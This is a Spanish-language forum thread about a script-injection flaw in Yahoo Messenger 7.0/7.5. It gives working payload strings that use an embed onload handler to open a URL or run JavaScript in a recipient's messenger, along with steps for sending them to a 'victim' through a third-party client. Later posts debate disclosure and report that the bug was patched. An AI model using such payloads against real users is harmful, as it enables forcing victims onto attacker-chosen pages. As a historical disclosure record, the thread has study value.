Vulnerabilidad seria en yahoo messenger

[Tcp_syn]

Acabo de encontrar otra vulnerabilidad del yahoo messenger. Si ustedes ponen este codigo en un mensaje privado de yahoo messenger www.google.com es abierto por el internet explorer instantaneamente.


helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(


Obviamente es posible realizar esta vulnerabilidad en forma remota haciendo que la victima entre a la pagina que nosotros querramos. :-) Después les explico como.
Testeado en versiones 7.0/7.5

[j8k6f4v9j]

juas, qué bueno

¿La has sacado tú? O la has encontrado por ahí?

Salu2

[Tcp_syn]

La encontre yo, en serio tiene un monton de variaciones ya que es posible escribir javascript en un mensaje privado por ejemplo "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=alert('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=alert('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas)Abre una ventana de advertencia con el mensaje Hola ó "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=document.write('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=document.write('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas) Escribe "hola" en la ventana del mensaje privado. Las opciones son infinitas.

Para hacerlo en forma remota tenemos que enviar un mensaje privado a la victima usando yahelite, enviandolo de la siguiente manera "s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas) "helomsg :" aqui en vez de un espacio insertamos alt+0160 osea "s:[espacio]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
Saludos.

[j8k6f4v9j]

Enhorabuena! y gracias por el aporte

Salu2

[CrAcKzMe]

Se lo has dicho a alguien más? Te has puesto ya en contacto con Yahoo?

Saludos y felicidades.

[Tcp_syn]

Si, se lo envíe a securityfocus y en el fulldisclosure de insecure http://www.securityfocus.com/bid/19211/ ó http://seclists.org/fulldisclosure/2006/Jul/0673.html yahoo por su parte bloqueó de su página principal la descarga de las versiones anteriores 7.0/7.5. Y reparó el bug en su versión 8.0.
Saludos

[Cypress]

todo bien, pero no me parece una buena idea hacer el trabajo de otros, y menos si ni siquiera te pagan, reconocen o te dan algun beneficio, sera que yahoo no me cae muy bien. creo que es eso, pero personalmete no me agrada la idea de informar de sus errores a ellos, por algo le pagan a programadores..., no se.
no creo que sea bienbenida mi idea, pero es lo que me parece
Saludos
Cypress

[clarinetista]

Si fuera por esa forma de pensar no existiria el software libre, ¿no crees?

[Cypress]

software libre es diferente a yahoo. de MICROSOFT

[j8k6f4v9j]

Cuando hablamos de libertad de conocimientos no nos estamos refiriendo a que se comparta la manera en que se explota un fallo sin publicar este fallo, ya sea yajú o gmail o lo que sea, hablamos de enseñar, publicar el código responsable de comportamiento de nuestras máquinas.

cypress, así es como se colabora realmente, como acaba de hacer Tcp_syn, no atacando sin sentido a corporaciones que nos caen mal, ¿nunca has pensado que quizá con tus campañas de supuesta concienciación est.ás alimentando al troll? O sea, ¿no crees que puedes ser tú quien hace publicidad gratuita a estas empresas que nada aportan al conocimiento en el terronode la informática?

Salu2

[j8k6f4v9j]

Además, esto es hacer trolling en un hilo dedicado a vulnerabilidades y ubicado en la sección correcta, tus opiniones y puntos de vista personales deberán ir en off-topic

Salu2

[Tcp_syn]

Cuando se descubrió la vulnerabilidad wmf los "programadores" de microsoft tardaron mas de 2 semanas en publicar el parche mientras que en otras páginas en muy poco tiempo publicaron parches no oficiales. La intencion de revelar un exploit es para que miles de entendidos en el tema puedan ayudar a la reparacion del mismo sin fines de lucro. Además a los "programadores" de microsoft les pagan de 100u$s a 500u$s por descubrir cada vulnerabilidad. ...si se publicara el codigo fuente de windows quiza le podamos dar una mano a microsoft...

[Cypress]

tengo que admitir cuando me he equivocado...
tienen razon.

[morza2]

TCP_SYN, no quiero desconfiar de ti, pero mira esto:
http://seclists.org/fulldisclosure/2006/Jul/0673.html
Excepto que te llames Ivan...fue otro el que lo descubrió

[Tcp_syn]

Si me llamo Iván enviame un mail si querés y te lo demuestro. :-)

[morza2]

Felicitaciones Ivan!!
Un orgullo tu descubrimiento.

salu2